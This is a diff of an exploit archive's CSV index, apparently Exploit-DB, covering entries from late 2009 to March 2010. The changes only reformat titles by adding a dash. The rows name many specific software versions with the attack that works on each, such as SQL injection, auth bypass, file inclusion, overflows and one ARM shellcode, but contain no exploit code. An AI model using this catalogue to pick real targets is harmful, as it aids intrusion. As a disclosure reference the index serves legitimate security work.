Denial of Service",2009-12-30,R3d-D3V!L,php,dos,0 10830,platforms/php/webapps/10830.txt,"Azadi Network (page) Remote SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange php (Auth Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 @@ -10048,7 +10048,7 @@ id,file,description,date,author,platform,type,port 10847,platforms/php/webapps/10847.txt,"Joomla Component com_mdigg SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0 10861,platforms/php/webapps/10861.txt,"Discuz <= 1.03 SQL Injection Exploit",2009-12-31,indoushka,php,webapps,0 -10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 (lng) LFI",2009-12-31,cOndemned,php,webapps,0 +10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) LFI",2009-12-31,cOndemned,php,webapps,0 10870,platforms/multiple/dos/10870.html,"Opera 10.10 Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games (Auth Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal (cid) Remote SQL Injection",2009-12-31,"Hussin X",php,webapps,0 @@ -10058,13 +10058,13 @@ id,file,description,date,author,platform,type,port 10877,platforms/php/webapps/10877.txt,"php-addressbook 3.1.5 - (edit.php) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 -10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0 +10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 - (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 - (.aap) BoF DoS",2009-12-31,jacky,windows,dos,0 10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - XSS/CSRF Vulnerabilities",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog Database Disclosure",2010-01-01,LionTurk,asp,webapps,0 10884,platforms/asp/webapps/10884.txt,"ArticleLive (blogs.php?Id) 1.7.1.2 - SQL Injection",2010-01-01,BAYBORA,asp,webapps,0 10885,platforms/php/webapps/10885.txt,"Cype CMS SQL Injection",2010-01-01,Sora,php,webapps,0 -10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 (NewsId) Remote SQL Injection",2010-01-01,Palyo34,php,webapps,0 +10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 - (NewsId) Remote SQL Injection",2010-01-01,Palyo34,php,webapps,0 10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0 @@ -10078,7 +10078,7 @@ id,file,description,date,author,platform,type,port 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash PoC",2010-01-02,SarBoT511,windows,dos,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0 -10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 (0Day)",2010-01-02,Lincoln,windows,remote,0 +10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - (0Day)",2010-01-02,Lincoln,windows,remote,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling",2010-01-02,DigitALL,php,webapps,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - (.m3u) Exploit (0Day)",2010-01-02,"fl0 fl0w",windows,dos,0 10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic ",php,webapps,0 @@ -10118,7 +10118,7 @@ id,file,description,date,author,platform,type,port 10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection Exploit",2010-01-03,Sora,php,webapps,0 -10979,platforms/php/webapps/10979.txt,"Joomla component com_oziogallery2 / IMAGIN arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 +10979,platforms/php/webapps/10979.txt,"Joomla component com_oziogallery2 - / IMAGIN arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 10980,platforms/linux/remote/10980.txt,"Skype for Linux <= 2.1 Beta - Multiple Strange Behavior",2010-01-04,emgent,linux,remote,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 @@ -10143,7 +10143,7 @@ id,file,description,date,author,platform,type,port 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash PoC",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x - IEHelper Remote Exec PoC (0Day)",2010-01-06,superli,windows,dos,0 -11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 (Post Auth) Remote BoF Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 +11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Post Auth) Remote BoF Exploit",2010-01-06,"His0k4 and Simo36",novell,remote,0 11023,platforms/asp/webapps/11023.txt,"Erolife AjxGaleri VT Database Disclosure",2010-01-06,LionTurk,asp,webapps,0 11024,platforms/php/webapps/11024.txt,"Joomla Component com_perchagallery SQL Injection",2010-01-06,FL0RiX,php,webapps,0 11025,platforms/php/webapps/11025.txt,"AWCM Database Disclosure",2010-01-06,alnjm33,php,webapps,0 @@ -10171,7 +10171,7 @@ id,file,description,date,author,platform,type,port 11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 - Multiple Permanent XSS (0Day)",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking (id) Blind SQL Injection",2010-01-07,"Hussin X",php,webapps,0 11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec PoC (0Day)",2010-01-08,superli,windows,dos,0 -11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 (print_view) Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps,0 +11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 - (print_view) Blind SQL Injection",2010-01-08,Red-D3v1L,php,webapps,0 11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Exec PoC (0Day)",2010-01-08,superli,windows,dos,0 11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec PoC (0Day)",2010-01-08,superli,windows,dos,0 11068,platforms/php/webapps/11068.txt,"Joomla Component com_ksadvertiser SQL Injection",2010-01-08,FL0RiX,php,webapps,0 @@ -10202,15 +10202,15 @@ id,file,description,date,author,platform,type,port 11103,platforms/windows/dos/11103.html,"VLC Player 0.8.6i - ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x File Upload",2010-01-11,Cyber_945,php,webapps,0 11106,platforms/multiple/dos/11106.bat,"Nuked KLan <= 1.7.7 & <= SP4 DoS",2010-01-11,"Hamza 'MIzoZ' N",multiple,dos,0 -11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 (SQL/XSS) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 -11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 (PLS File) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 +11107,platforms/php/webapps/11107.txt,"gridcc script 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-11,Red-D3v1L,php,webapps,0 +11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - (PLS File) Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 11110,platforms/php/webapps/11110.txt,"Image Hosting Script Remote shell upload",2010-01-11,R3d-D3V!L,php,webapps,0 11111,platforms/php/webapps/11111.txt,"FAQEngine 4.24.00 - Remote File Inclusion",2010-01-11,kaMtiEz,php,webapps,0 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 - Local .html Buffer Overflow (Win32) Exploit",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection",2010-01-11,"ALTBTA ",php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 11117,platforms/ios/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote DoS Exploit (0Day)",2010-01-12,mr_me,ios,dos,8080 -11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 +11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 - (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 - Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0 11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow DoS PoC",2010-01-13,"Julien Bedard",hardware,dos,2121 11126,platforms/php/webapps/11126.txt,"Populum 2.3 - SQL Injection",2010-01-13,SiLeNtp0is0n,php,webapps,80 @@ -10288,10 +10288,10 @@ id,file,description,date,author,platform,type,port 11214,platforms/windows/dos/11214.html,"Windows Live Messenger 2009 - ActiveX Heap Overflow PoC",2010-01-21,SarBoT511,windows,dos,0 11215,platforms/windows/webapps/11215.txt,"SHOUTcast Server <= 1.9.8/Win32 - CSRF",2010-01-21,"cp77fk4r ",windows,webapps,0 11216,platforms/php/webapps/11216.txt,"Blog System 1.x - (note) SQL Injection",2010-01-21,"BorN To K!LL",php,webapps,0 -11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 +11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - (defer)Remote Buffer Overflow PoC",2010-01-21,SkuLL-HackeR,windows,dos,0 11218,platforms/multiple/webapps/11218.txt,"jQuery uploadify 2.1.0 - Remote File Upload",2010-01-21,k4cp3r/Ablus,multiple,webapps,0 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 -11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 +11220,platforms/windows/remote/11220.py,"IntelliTamper 2.07/2.08 - (SEH) Remote Buffer Overflow",2010-01-22,loneferret,windows,remote,0 11222,platforms/php/webapps/11222.txt,"Joomla Component com_gameserver SQL Injection",2010-01-22,B-HUNT3|2,php,webapps,0 11223,platforms/php/webapps/11223.txt,"Joomla (com_avosbillets) SQL Injection",2010-01-22,snakespc,php,webapps,0 11224,platforms/php/webapps/11224.txt,"KosmosBlog 0.9.3 - (SQLi/XSS/CSRF) Multiple Vulnerabilities",2010-01-22,"Milos Zivanovic ",php,webapps,0 @@ -10373,7 +10373,7 @@ id,file,description,date,author,platform,type,port 11319,platforms/php/webapps/11319.txt,"MYRE Classified (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0 11320,platforms/windows/dos/11320.pl,"Digital Amp MP3 3.1 - (.Mp3) Local Crash PoC",2010-02-02,SkuLL-HackeR,windows,dos,0 11321,platforms/php/webapps/11321.txt,"MobPartner Chat Multiple SQL Injection Vulnerabilities",2010-02-02,"AtT4CKxT3rR0r1ST ",php,webapps,0 -11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 (Add Admin) CSRF",2010-02-03,"Milos Zivanovic ",php,webapps,0 +11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - (Add Admin) CSRF",2010-02-03,"Milos Zivanovic ",php,webapps,0 11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script (Auth Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0 11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0 11325,platforms/php/webapps/11325.txt,"RealAdmin (detail.php) Blind SQL Injection",2010-02-03,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -10395,18 +10395,18 @@ id,file,description,date,author,platform,type,port 11342,platforms/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local DoS",2010-02-06,"Nishant Das Patnaik",windows,dos,0 11343,platforms/windows/dos/11343.py,"httpdx 1.5.2 - Remote Pre-Authentication DoS (PoC)",2010-02-07,loneferret,windows,dos,0 11344,platforms/php/webapps/11344.txt,"WSN Guest Database Disclosure",2010-02-07,"HackXBack ",php,webapps,0 -11345,platforms/php/webapps/11345.txt,"Zen Tracking <= 2.2 (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 -11346,platforms/php/webapps/11346.txt,"Baal Systems <= 3.8 (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11345,platforms/php/webapps/11345.txt,"Zen Tracking <= 2.2 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11346,platforms/php/webapps/11346.txt,"Baal Systems <= 3.8 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11347,platforms/windows/dos/11347.html,"Safari 4.0.4 + Firefox 3.5.7 + SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",windows,dos,0 11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0 -11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0 +11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0 11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0 11351,platforms/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",solaris,dos,0 11352,platforms/php/webapps/11352.txt,"Joomla Component com_productbook SQL Injection",2010-02-07,snakespc,php,webapps,0 11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple CSRF Vulnerabilities",2010-02-07,"Milos Zivanovic ",php,webapps,0 -11354,platforms/php/webapps/11354.txt,"Killmonster <= 2.1 (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11354,platforms/php/webapps/11354.txt,"Killmonster <= 2.1 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11355,platforms/php/webapps/11355.txt,"EncapsCMS <= 0.3.6 - (config[path]) Remote File Include",2010-02-07,"cr4wl3r ",php,webapps,0 -11356,platforms/php/webapps/11356.txt,"Rostermain <= 1.1 (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 +11356,platforms/php/webapps/11356.txt,"Rostermain <= 1.1 - (Auth Bypass) SQL Injection",2010-02-07,"cr4wl3r ",php,webapps,0 11357,platforms/php/webapps/11357.txt,"Uiga Business Portal SQL/ XSS",2010-02-07,"Sioma Labs",php,webapps,0 11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,"mc2_s3lector ",php,webapps,0 11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Include",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0 @@ -10466,9 +10466,9 @@ id,file,description,date,author,platform,type,port 11429,platforms/php/webapps/11429.txt,"Vito CMS SQL Injection",2010-02-13,hacker@sr.gov.yu,php,webapps,0 11430,platforms/php/webapps/11430.txt,"southburn Web (products.php) SQL Injection",2010-02-13,"AtT4CKxT3rR0r1ST ",php,webapps,0 11431,platforms/php/webapps/11431.txt,"MRW PHP Upload Remote file upload",2010-02-13,Phenom,php,webapps,0 -11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 +11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0 -11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0 +11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0 11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - (DBD/LFI) Multiple Vulnerabilities",2010-02-13,"ViRuSMaN ",php,webapps,0 11438,platforms/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service Exploit",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0 @@ -10476,7 +10476,7 @@ id,file,description,date,author,platform,type,port 11442,platforms/php/webapps/11442.txt,"PEAR 1.9.0 - Multiple Remote File Inclusion",2010-02-14,eidelweiss,php,webapps,0 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQLi",2010-02-14,Thibow,php,webapps,0 -11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 (druckansicht.php) SQL Injection",2010-02-14,Lo$T,php,webapps,0 +11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - (druckansicht.php) SQL Injection",2010-02-14,Lo$T,php,webapps,0 11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery Remote SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla (Jw_allVideos) Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla com_videos Remote SQL Injection",2010-02-14,snakespc,php,webapps,0 @@ -10596,7 +10596,7 @@ id,file,description,date,author,platform,type,port 11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow Exploit (0Day)",2010-02-26,mr_me,windows,local,0 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo news.php - SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 BETA (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 -11584,platforms/php/webapps/11584.txt,"Project Man <= 1.0 (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 +11584,platforms/php/webapps/11584.txt,"Project Man <= 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 - Local File Include",2010-02-27,"cr4wl3r ",php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0 @@ -10604,14 +10604,14 @@ id,file,description,date,author,platform,type,port 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0 -11593,platforms/php/webapps/11593.txt,"Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 +11593,platforms/php/webapps/11593.txt,"Uiga Fan Club <= 1.0 - (Auth Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11595,platforms/php/webapps/11595.php,"Joomla Component com_paxgallery Blind Injection",2010-02-27,snakespc,php,webapps,0 11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0 11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem micro_httpd DoS/PoC",2010-02-28,ad0nis,hardware,dos,0 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal index.php SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club index.php SQL Injection",2010-02-28,"Easy Laster",php,webapps,0 11601,platforms/windows/dos/11601.pl,"Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 -11602,platforms/php/webapps/11602.txt,"HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 +11602,platforms/php/webapps/11602.txt,"HazelPress Lite <= 0.0.4 - (Auth Bypass) SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 11603,platforms/php/webapps/11603.txt,"Joomla Component com_yanc SQL Injection",2010-02-28,snakespc,php,webapps,0 11604,platforms/php/webapps/11604.php,"Joomla Component com_liveticker Blind SQL Injection",2010-02-28,snakespc,php,webapps,0 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri <= 2.1 - SQL Injection",2010-02-28,"cr4wl3r ",php,webapps,0 @@ -10646,7 +10646,7 @@ id,file,description,date,author,platform,type,port 11637,platforms/php/webapps/11637.txt,"auktionshaus 3.0.0.1 - news.php (id) SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service PoC",2010-03-06,Blade,windows,dos,0 -11641,platforms/php/webapps/11641.txt,"phpCOIN 1.2.1 (mod.php) LFI",2010-03-06,_mlk_,php,webapps,0 +11641,platforms/php/webapps/11641.txt,"phpCOIN 1.2.1 - (mod.php) LFI",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11644,platforms/multiple/dos/11644.py,"Flare <= 0.6 - Local Heap Overflow DoS",2010-03-06,l3D,multiple,dos,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 @@ -10716,7 +10716,7 @@ id,file,description,date,author,platform,type,port 11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express <= 3.01 - Remote Code Execution/Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection",2010-03-14,N2n-Hacker,php,webapps,0 -11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0 +11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 - (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 @@ -10816,13 +10816,13 @@ id,file,description,date,author,platform,type,port 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote Include",2010-03-21,"cr4wl3r ",php,webapps,0 11831,platforms/php/webapps/11831.txt,"WebMaid CMS <= 0.2-6 Beta - Multiple Remote File Include",2010-03-21,"cr4wl3r ",php,webapps,0 11832,platforms/php/webapps/11832.txt,"NotSopureEdit <= 1.4.1 - Remote File Include",2010-03-21,"cr4wl3r ",php,webapps,0 -11833,platforms/php/webapps/11833.txt,"4x CMS <= r26 (Auth Bypass) SQL Injection",2010-03-21,"cr4wl3r ",php,webapps,0 +11833,platforms/php/webapps/11833.txt,"4x CMS <= r26 - (Auth Bypass) SQL Injection",2010-03-21,"cr4wl3r ",php,webapps,0 11834,platforms/windows/local/11834.py,"Kenward Zipper 1.4 - Stack Buffer Overflow PoC Exploit (0Day)",2010-03-22,mr_me,windows,local,0 -11835,platforms/php/webapps/11835.txt,"Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0 +11835,platforms/php/webapps/11835.txt,"Mini CMS RibaFS 1.0 - (Auth Bypass) SQL Injection",2010-03-22,"cr4wl3r ",php,webapps,0 11836,platforms/php/webapps/11836.txt,"CMS Openpage (index.php) SQL Injection",2010-03-22,Phenom,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps,0 11837,platforms/php/webapps/11837.txt,"Uiga Fan Club SQL Injection",2010-03-22,"Sioma Labs",php,webapps,0 -11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 +11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 - (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 11840,platforms/php/webapps/11840.txt,"PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection",2010-03-22,"Easy Laster",php,webapps,0 11841,platforms/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 @@ -10852,7 +10852,7 @@ id,file,description,date,author,platform,type,port 11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS SQL Injection",2010-03-25,Inj3ct0r,php,webapps,0 11874,platforms/php/webapps/11874.txt,"INVOhost SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 11875,platforms/php/webapps/11875.py,"Easy-Clanpage <= 2.01 - SQL Injection Exploit",2010-03-25,"Easy Laster",php,webapps,0 -11876,platforms/php/webapps/11876.txt,"justVisual 2.0 (index.php) <= LFI",2010-03-25,eidelweiss,php,webapps,0 +11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - (index.php) <= LFI",2010-03-25,eidelweiss,php,webapps,0 11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Stack BOF (2)",2010-03-25,sud0,windows,remote,21 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 @@ -10924,8 +10924,8 @@ id,file,description,date,author,platform,type,port 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0 11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker - (.wma) Local Crash",2010-03-30,anonymous,windows,dos,0 11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Include",2010-03-30,mat,php,webapps,0 